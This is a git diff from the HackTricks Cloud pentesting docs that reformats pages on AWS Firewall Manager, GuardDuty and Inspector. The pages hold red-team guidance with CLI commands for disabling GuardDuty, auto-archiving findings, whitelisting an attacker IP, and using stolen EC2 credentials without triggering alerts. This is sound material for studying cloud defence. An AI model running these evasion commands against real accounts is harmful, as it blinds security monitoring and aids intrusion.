these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required. It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option. @@ -63,31 +50,31 @@ AWS Firewall Manager offers flexibility in managing firewall resources within yo **Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include: -* Accounts or organizational units (OUs) that the administrator can apply policies to. -* Regions where the administrator can perform actions. -* Firewall Manager policy types that the administrator can manage. +- Accounts or organizational units (OUs) that the administrator can apply policies to. +- Regions where the administrator can perform actions. +- Firewall Manager policy types that the administrator can manage. Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege. There are two distinct types of administrator accounts, each serving specific roles and responsibilities: -* **Default Administrator:** - * The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. - * This account has the capability to manage third-party firewalls and possesses full administrative scope. - * It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. - * While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. -* **Firewall Manager Administrators:** - * These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. - * Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. - * Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. +- **Default Administrator:** + - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager. + - This account has the capability to manage third-party firewalls and possesses full administrative scope. + - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization. + - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization. +- **Firewall Manager Administrators:** + - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration. + - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards. + - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager. Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources. It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed: -* First, each Firewall Administrator administrator account must revoke their own account. -* Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. -* To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. +- First, each Firewall Administrator administrator account must revoke their own account. +- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account. +- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator. ## Enumeration @@ -120,7 +107,7 @@ aws fms get-resource-set --identifier # ReadOnlyAccess policy is not en ## Retrieve the list of tags for a given resource aws fms list-tags-for-resource --resource-arn -## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. +## List of the resources in the AWS Organization's accounts that are available to be associated with a FM resource set. Only one account is supported per request. aws fms list-compliance-status --member-account-ids --resource-type # ReadOnlyAccess policy is not enough for this ## List the resources that are currently associated to a resource set @@ -182,9 +169,9 @@ aws fms get-violation-details --policy-id --member-account --res An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association. -* The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. -* In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. -* The creation of a Firewall Manager administrator account can only be done by the organization's management account. +- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account. +- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**. +- The creation of a Firewall Manager administrator account can only be done by the organization's management account. ```bash aws fms associate-admin-account --admin-account @@ -207,19 +194,25 @@ An example of permisive policy through permisive security group, in order to byp ```json { - "Policy": { - "PolicyName": "permisive_policy", - "SecurityServicePolicyData": { - "Type": "SECURITY_GROUPS_COMMON", - "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" - }, - "ResourceTypeList": ["AWS::EC2::Instance", "AWS::EC2::NetworkInterface", "AWS::EC2::SecurityGroup", "AWS::ElasticLoadBalancingV2::LoadBalancer", "AWS::ElasticLoadBalancing::LoadBalancer"], - "ResourceType": "AWS::EC2::SecurityGroup", - "ExcludeResourceTags": false, - "ResourceTags": [], - "RemediationEnabled": true + "Policy": { + "PolicyName": "permisive_policy", + "SecurityServicePolicyData": { + "Type": "SECURITY_GROUPS_COMMON", + "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" }, - "TagList": [] + "ResourceTypeList": [ + "AWS::EC2::Instance", + "AWS::EC2::NetworkInterface", + "AWS::EC2::SecurityGroup", + "AWS::ElasticLoadBalancingV2::LoadBalancer", + "AWS::ElasticLoadBalancing::LoadBalancer" + ], + "ResourceType": "AWS::EC2::SecurityGroup", + "ExcludeResourceTags": false, + "ResourceTags": [], + "RemediationEnabled": true + }, + "TagList": [] } ``` @@ -271,9 +264,9 @@ To use **`fms:PutNotificationChannel`** outside of the console, you need to set For information about configuring an SNS access policy: -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-sns-enum.md +{{#endref}} ```bash aws fms put-notification-channel --sns-topic-arn --sns-role-name @@ -286,9 +279,8 @@ aws fms delete-notification-channel An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. -{% hint style="warning" %} -Only the default administrator can create and manage third-party firewalls. -{% endhint %} +> [!WARNING] +> Only the default administrator can create and manage third-party firewalls. ```bash aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] @@ -310,21 +302,8 @@ aws fms untag-resource --resource-arn --tag-keys ## References -* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) -* [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) +- [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) +- [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md similarity index 60% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md index 3f2e03746..6b102d98c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md @@ -1,19 +1,6 @@ # AWS - GuardDuty Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## GuardDuty @@ -23,17 +10,16 @@ Amazon GuardDuty **identifies unusual activity within your accounts**, analyses Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. -{% hint style="warning" %} -When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ -If you just stop it, the existing findings will remain. -{% endhint %} +> [!WARNING] +> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ +> If you just stop it, the existing findings will remain. ### Findings Example -* **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. -* **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. -* **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. -* **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. +- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. +- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. +- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. +- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets.
@@ -41,26 +27,26 @@ If you just stop it, the existing findings will remain. Finding summary: -* Finding type -* Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low -* Region -* Account ID -* Resource ID -* Time of detection -* Which threat list was used +- Finding type +- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low +- Region +- Account ID +- Resource ID +- Time of detection +- Which threat list was used The body has this information: -* Resource affected -* Action -* Actor: Ip address, port and domain -* Additional Information +- Resource affected +- Action +- Actor: Ip address, port and domain +- Additional Information
### All Findings -Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) ### Multi Accounts @@ -76,7 +62,6 @@ An account that gets designated as a delegated administrator becomes a GuardDuty ## Enumeration -{% code overflow="wrap" %} ```bash # Get Org config aws guardduty list-organization-admin-accounts #Get Delegated Administrator @@ -96,7 +81,7 @@ aws guardduty list-filters --detector-id # Check filters aws guardduty get-filter --detector-id --filter-name # Findings -aws guardduty list-findings --detector-id # List findings +aws guardduty list-findings --detector-id # List findings aws guardduty get-findings --detector-id --finding-ids # Get details about the finding aws guardduty get-findings-statistics --detector-id --finding-statistic-types @@ -116,7 +101,6 @@ aws guardduty list-publishing-destinations --detector-id aws guardduty list-threat-intel-sets --detector-id aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id ``` -{% endcode %} ## GuardDuty Bypass @@ -124,17 +108,17 @@ aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id Try to find out as much as possible about the behaviour of the credentials you are going to use: -* Times it's used -* Locations -* User Agents / Services (It could be used from awscli, webconsole, lambda...) -* Permissions regularly used +- Times it's used +- Locations +- User Agents / Services (It could be used from awscli, webconsole, lambda...) +- Permissions regularly used With this information, recreate as much as possible the same scenario to use the access: -* If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) -* If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges -* Always try to use the **same permissions** this principal has used -* If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) +- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) +- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges +- Always try to use the **same permissions** this principal has used +- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) ### Breaking GuardDuty @@ -142,50 +126,41 @@ With this information, recreate as much as possible the same scenario to use the With this permission you could disable GuardDuty to avoid triggering alerts. -{% code overflow="wrap" %} ```bash -aws guardduty update-detector --detector-id --no-enable +aws guardduty update-detector --detector-id --no-enable aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} ``` -{% endcode %} #### `guardduty:CreateFilter` Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: -{% code overflow="wrap" %} ```bash aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE ``` -{% endcode %} #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. -{% code overflow="wrap" %} ```bash aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv ``` -{% endcode %} #### `guardduty:DeletePublishingDestination` Attackers could remove the destination to prevent alerting: -{% code overflow="wrap" %} ```bash aws guardduty delete-publishing-destination --detector-id --destination-id ``` -{% endcode %} -{% hint style="danger" %} -Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. -{% endhint %} +> [!CAUTION] +> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. ### Specific Findings Bypass Examples -Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. +Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. Here you have a couple of examples of specific GuardDuty findings bypasses: @@ -201,32 +176,18 @@ To prevent this you can search from the script `session.py` in the `botocore` pa Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. -{% hint style="success" %} -Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. -{% endhint %} +> [!TIP] +> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. ## References -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/findings\_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) -* [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) -* [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) +- [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) +- [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md similarity index 75% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index c2e414d65..38692c854 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -2,20 +2,7 @@ ## AWS - Inspector Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ### Inspector @@ -27,15 +14,15 @@ Amazon Inspector is an advanced, automated vulnerability management service desi Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: -* **Active**: The finding has not been remediated. -* **Closed**: The finding has been remediated. -* **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. +- **Active**: The finding has not been remediated. +- **Closed**: The finding has been remediated. +- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. Findings are also categorized into the next three types: -* **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. -* **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. -* **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. +- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. +- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. +- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. #### Filters and Suppression Rules @@ -57,42 +44,42 @@ When exporting findings, a Key Management Service (KMS) key is necessary to encr Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. -* **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. -* **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. +- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. +- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. The scan mode determines which method will be used to perform EC2 scans: -* **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. -* **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. +- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. +- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: -* `/usr/lib` -* `/usr/lib64` -* `/usr/local/lib` -* `/usr/local/lib64` +- `/usr/lib` +- `/usr/lib64` +- `/usr/local/lib` +- `/usr/local/lib64` #### Amazon ECR container images scanning Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. -* **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. -* **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. +- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. +- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. #### Amazon Lambda functions scanning Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: -* **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a 